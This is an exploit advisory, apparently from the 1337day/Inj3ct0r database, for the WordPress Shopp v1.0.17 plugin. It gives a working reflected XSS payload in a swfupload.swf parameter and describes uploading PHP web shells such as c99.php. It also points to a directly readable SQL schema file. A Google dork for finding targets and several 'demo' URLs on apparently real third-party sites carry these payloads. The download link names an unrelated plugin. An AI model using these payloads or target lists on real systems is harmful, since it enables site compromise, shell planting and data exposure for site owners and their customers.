1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm T0x!c member from Inj3ct0r Team                    1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

#### 
# Exploit Title: WordPress Shopp v1.0.17 - eCommerce Plugin <= (xSS/LFI) Multiple Vulnerabilities
# Author: T0x!c
# Date : 05/10/2012  
# Facebook Page: www.facebook.com/DzTem
# E-mail: Malik_99@hotmail.fr
# Category:: webapps
# Google Dork: inurl:"/gateways/2Checkout/"
# Download: http://wordpress.org/extend/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/
# Version: v1.0.17
# Tested on: [Windows 7]
####
# Greetings tO: |KhalEd Ked'Ans| ^___^ I MiSS yOu br0thEr <3

#### P0c (1) Reflected xSS =>
-> http://127.0.0.1/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//

#### P0c (2) File Upload =>
->http://127.0.0.1/Shopp_v1.0.17/core/ui/behaviors/swfupload/swfupload.swf
you can upload files with php extension.
Example: c99.php, shell.gif.php, etc...

#### P0c (3) Access sensitive SQL file =>
->http://127.0.0.1/Shopp_v1.0.17/core/model/schema.sql
etc...

####
#Demo site:
#http://fiandco.com/wp-content/plugins/shopp-1/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//
#http://presspermit.com/wp-content/plugins/shopp/core/ui/behaviors/swfupload/swfupload.swf
#http://gopalo.com/wp-content/plugins/shopp/core/model/schema.sql
#http://hisgem.net/wp-content/plugins/shopp/core/ui/behaviors/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xSS");//
#http://www.innererklang.com/shop/gateways/core/model/schema.sql
####





# - Special Thanks:
# ...:::' 1337day - Inj3ct0r TEAM ':::...